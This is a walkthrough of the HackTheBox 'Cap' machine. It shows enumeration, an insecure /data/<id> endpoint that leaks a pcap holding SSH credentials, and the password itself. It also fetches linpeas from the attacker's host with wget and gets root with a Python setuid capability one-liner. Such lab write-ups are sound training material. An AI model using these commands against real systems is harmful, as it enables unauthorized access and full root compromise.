Cap

A relatively easy Linux box in HackTheBox, you can root it in less than an hour.

nmap

(base) [psdon@arch cap]$ mkdir nmap  
(base) [psdon@arch cap]$ sudo rustscan -a 10.10.10.245 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan 

A web server is running on port 80.

Web Enumeration

There's an interesting section in the sidebar which is located on /capture and when you go to that URL, you will be redirected to /data/<int>

Every time I visit /capture, the integer parameter in /data/1 was incrementing by 1.

So I change it to /data/0 and I got a pcap file, and I analyze it on wireshark and found a credentials on it.

Initial Shell

I login using that credentials on SSH, and looks like we got an initial shell. Sweet :D

(base) [psdon@arch cap]$ ssh nathan@10.10.10.245                                                         
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.                             
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.                           
This key is not known by any other names                                                                 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                 
Warning: Permanently added '10.10.10.245' (ED25519) to the list of known hosts.                          
nathan@10.10.10.245's password: Buck3tH4TF0RM3!                                                                         
nathan@cap:~$

Post Exploitation

First, let's transfer linpeas.sh from our machine to the target machine

(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/                                                  
(base) [psdon@arch linPEAS]$ ls                                                                           
builder  images  linpeas.sh  README.md                                                                    
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80                                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 

You can find the machine IP address by executing the following.

(base) [psdon@arch ~]$ ip a | grep tun0
9: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    inet 10.10.14.15/23 scope global tun0

Then transfer the script using wget

nathan@cap:~$ wget http://10.10.14.15/linpeas.sh                                                         
--2021-08-29 19:09:04--  http://10.10.14.15/linpeas.sh                                                   
Connecting to 10.10.14.15:80... connected.

nathan@cap:~$ chmod +x linpeas.sh 

Then run linpeas.sh

nathan@cap:~$ ./linpeas.sh                                                                                                                                                                                         
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
                            β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                                         
                    β–„β–„β–„β–„β–„β–„β–„             β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                                   
             β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„                                                                                                                                                               
         β–„β–„β–„β–„     β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„                                                                                                                                                          
         β–„    β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„          β–„β–„β–„β–„β–„β–„               β–„β–„β–„β–„β–„β–„ β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„β–„              β–„β–„β–„β–„β–„β–„β–„β–„                 β–„β–„β–„β–„                                                                                                                                                         
         β–„β–„                  β–„β–„β–„ β–„β–„β–„β–„β–„                  β–„β–„β–„                                                                                                                                                        
         β–„β–„                β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                  β–„β–„                                                                                                                                                        
         β–„            β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„   β–„β–„                                                                                                                                                        
         β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„     β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„   β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„      β–„ β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„     β–„β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„   β–„β–„β–„β–„β–„                                                                                                                                                         
          β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„        β–„          β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                         
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                        
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„            β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                                                                                                                                        
          β–€β–€β–„β–„β–„   β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–€β–€β–€β–€β–€β–€                                                                                                                                                         
               β–€β–€β–€β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–€β–€                                                                                                                                                                  
                     β–€β–€β–€β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–€β–€β–€                                                                                                                                                                       
                                                                                                                                                                                                                   
      /---------------------------------------------------------------------------\                                                                                                                                
      |                             Do you like PEASS?                            |                                                                                                                                
      |---------------------------------------------------------------------------|                                                                                                                                
      |         Become a Patreon    :     https://www.patreon.com/peass           |                                                                                                                                
      |         Follow on Twitter   :     @carlospolopm                           |                                                                                                                                
      |         Respect on HTB      :     SirBroccoli & makikvues                 |                                                                                                                                
      |---------------------------------------------------------------------------|                                                                                                                                
      |                                 Thank you!                                |                                                                                                                                
      \---------------------------------------------------------------------------/                                                                                                                                
        linpeas-ng by carlospolop                                      

I noticed python3.8 binary was set a capability.

Privilege Escalation

We can gain root by executing the following command

nathan@cap:/var/www/html$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'                                                                                                                 
root@cap:/var/www/html#  

Last updated

Was this helpful?